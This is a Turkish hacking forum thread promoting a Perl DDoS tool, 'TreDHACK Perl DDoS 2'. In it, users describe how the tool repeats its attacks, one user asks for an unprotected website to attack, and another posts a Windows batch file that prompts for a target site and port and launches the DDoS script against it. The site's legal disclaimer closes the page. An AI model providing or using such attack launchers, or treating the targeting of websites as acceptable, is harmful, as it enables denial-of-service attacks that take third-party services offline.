TreDHACK Perl DDoS 2 Çıktı ! 4 Kat Daha Güçlü !

TreDHACK

Katılımcı Üye
17 Eki 2013
723
0
Saldırı 100 Saniye Sonra Yapılıcak Dediğine Bakma o 100 Saniye Saldırı Yapıyor 100 Saniye Sonra Tekrar Saldırıyor.

DIGITALs

Üye
13 Tem 2015
76
0
[VB].Net
Kardeşim bana bi site atarmısın korumasız felan o site üstünde deniyeceğim..Saldırdığım sitelerin hiçbirinde olumlu bir sonuç vermedi..Kusura bakma ama fazla iyi olmamış gibi..Ayrıca alıntı olduğunu düşünüyorum..

dorukyurdusen3

Katılımcı Üye
7 Ocak 2016
577
0
Kardeş işleri kolaylaştıracak bir bat yaptım.

@echo off
set /p dns="Website linki: "
set /p port="Port girin (eger bossa 80) "
Perl tredhack.pl -dns %dns% -port %port%

Bunu notdefterine yapıştırın ve .bat olarak kaydedin tredhack ile aynı klasörde olmalı

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.